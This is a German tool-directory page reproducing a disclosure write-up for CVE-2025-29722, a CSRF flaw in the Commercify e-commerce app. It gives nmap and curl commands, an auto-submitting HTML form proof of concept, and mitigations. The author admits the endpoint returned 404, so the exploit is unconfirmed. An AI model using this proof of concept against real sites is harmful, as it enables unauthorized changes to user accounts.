Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-29722 — Cross-Site Request Forgery (CSRF) in Commercify v1.0 | Kitploit
Tools/GitHubGitHub/cypherdavy/cve-2025-29722
AufklärungSchwachstellenanalyseWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubcypherdavy/cve-2025-29722

CVE-2025-29722

Cross-Site Request Forgery (CSRF) in Commercify v1.0

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🛡️ CVE-2025-29722 – Cross Site Request Forgery (CSRF) in Commercify v1.0

Entdeckt von: David P.S Abraham (alias Davycipher)


CVE-ID

CVE-2025-29722 wurde dieser Schwachstelle von der MITRE Corporation zugewiesen.


Zusammenfassung

In Commercify v1.0, einer quelloffenen E-Commerce-Plattform von @yassmittal, wurde eine CSRF-Schwachstelle identifiziert. Die Anwendung verfügt an kritischen Endpunkten wie /update_settings über keine ordnungsgemäßen CSRF-Schutzmechanismen. Dadurch können Angreifer manipulierte Anfragen erstellen, die bei Ausführung von einer anderen Domain Benutzerdaten verändern.


Betroffenes Produkt

  • Produktname: Commercify
  • Version: 1.0
  • Repository: https://github.com/yassmittal/Commercify

Schwachstellentyp

  • CWE-352: Cross-Site Request Forgery (CSRF)

Vorgehen bei der Ausnutzung

Aufklärungsphase

Ein nmap-Scan ergab, dass der Dienst über Port 5173 erreichbar war, was auf einen möglichen Entwicklungsserver hindeutet.

root@kitploit:~
nmap -p 5173 localhost

Anschließend habe ich die Anwendung mit nikto gescannt; dabei wurden folgende Punkte sichtbar:

  • Fehlender X-Frame-Options-Header
  • Permissive CORS-Richtlinie (Access-Control-Allow-Origin: *)
  • Fehlende CSRF-Schutz-Header

Brute-Force-Suche nach Endpunkten

Bei der Untersuchung der Anwendung vermutete ich aufgrund der Funktionen des Benutzer-Dashboards einen möglichen update_settings-Endpunkt. Ich testete ihn mit:

root@kitploit:~
curl -X POST "http://localhost:5173/update_settings" \
-d "username=attacker&[email protected]"

Obwohl ein 404 Not Found zurückgegeben wurde, kann dieses Verhalten umgebungsabhängig sein. In gültigen Bereitstellungen könnte dies zu einer vollständigen Kontomanipulation führen.


Proof of Concept (PoC)

HTML-basierter Angriff zur Ausnutzung der CSRF-Schwachstelle:

root@kitploit:~
<form action="http://localhost:5173/update_settings" method="POST">
  <input type="hidden" name="username" value="attacker">
  <input type="hidden" name="email" value="[email protected]">
</form>
<script>
  document.forms[0].submit();
</script>

Auswirkungen

  • Unbefugte Änderungen an Benutzerkontodaten
  • Privilegienerweiterung, wenn Einstellungen eine Manipulation von Rolle oder E-Mail-Adresse beinhalten
  • Kontoübernahme-Szenarien

Grundursache

  • Fehlende CSRF-Tokens
  • Kein SameSite-Cookie-Attribut
  • Permissive CORS-Konfiguration (*)
  • Keine Referer- oder Origin-Validierung

Gegenmaßnahmen & Empfehlungen

  • CSRF-Tokens für alle zustandsändernden Endpunkte einführen
  • SameSite=Strict oder Lax für Cookies festlegen
  • Strikte CORS-Richtlinien definieren
  • Origin-/Referer-Validierung implementieren

Entdecker

David P.S. Abraham
Alias: Davycipher

  • GitHub
  • LinkedIn
  • Website

Tool herunterladen